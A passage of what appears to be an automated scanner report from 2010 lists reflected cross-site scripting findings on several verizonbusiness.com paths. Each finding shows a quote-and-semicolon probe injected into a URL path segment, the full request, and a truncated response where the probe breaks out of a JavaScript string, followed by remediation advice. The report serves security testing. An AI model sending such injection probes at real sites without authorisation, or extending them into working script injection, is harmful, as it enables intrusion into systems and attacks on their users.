Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4d16"%3be5812192d28 was submitted in the REST URL parameter 1. This input was echoed as c4d16";e5812192d28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc4d16"%3be5812192d28/wholesale/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:37 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc4d16";e5812192d28/wholesale/us/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.1045. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ad69"%3b86ccabfb7e6 was submitted in the REST URL parameter 2. This input was echoed as 1ad69";86ccabfb7e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale1ad69"%3b86ccabfb7e6/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:00 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale1ad69";86ccabfb7e6/us/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.1046. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8628'%3b2c6094de57c was submitted in the REST URL parameter 2. This input was echoed as b8628';2c6094de57c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesaleb8628'%3b2c6094de57c/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesaleb8628';2c6094de57c/us/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1047. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98b2d"%3b593fa051533 was submitted in the REST URL parameter 3. This input was echoed as 98b2d";593fa051533 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/us98b2d"%3b593fa051533/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 42745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale/us98b2d";593fa051533/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1048. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62063'%3bfbe0bc90b1d was submitted in the REST URL parameter 3. This input was echoed as 62063';fbe0bc90b1d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/us62063'%3bfbe0bc90b1d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:55 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 42745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale/us62063';fbe0bc90b1d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1049. http://www.verizonbusiness.com/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10df1"%3b28c9b65fbe2 was submitted in the REST URL parameter 1. This input was echoed as 10df1";28c9b65fbe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support10df1"%3b28c9b65fbe2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:13 GMT
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support10df1";28c9b65fbe2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1050. http://www.verizonbusiness.com/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8df3c'%3bfdb55deb1df was submitted in the REST URL parameter 1. This input was echoed as 8df3c';fdb55deb1df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support8df3c'%3bfdb55deb1df/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support8df3c';fdb55deb1df/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1051. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb8c'%3ba354101715 was submitted in the REST URL parameter 1. This input was echoed as 1cb8c';a354101715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support1cb8c'%3ba354101715/myaccount/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:48 GMT
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support1cb8c';a354101715/myaccount/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1052. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2796"%3b9baff890e09 was submitted in the REST URL parameter 1. This input was echoed as e2796";9baff890e09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporte2796"%3b9baff890e09/myaccount/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supporte2796";9baff890e09/myaccount/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1053. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80bc'%3be1012bde3f2 was submitted in the REST URL parameter 2. This input was echoed as d80bc';e1012bde3f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountd80bc'%3be1012bde3f2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:14 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountd80bc';e1012bde3f2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1054. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba6b0"%3b2a7864776f6 was submitted in the REST URL parameter 2. This input was echoed as ba6b0";2a7864776f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountba6b0"%3b2a7864776f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountba6b0";2a7864776f6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1055. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3c9'%3b622ffe19eef was submitted in the REST URL parameter 1. This input was echoed as 5b3c9';622ffe19eef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support5b3c9'%3b622ffe19eef/myaccount/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support5b3c9';622ffe19eef/myaccount/tools/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1056. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f39"%3b0dd42e83298 was submitted in the REST URL parameter 1. This input was echoed as 36f39";0dd42e83298 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support36f39"%3b0dd42e83298/myaccount/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support36f39";0dd42e83298/myaccount/tools/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
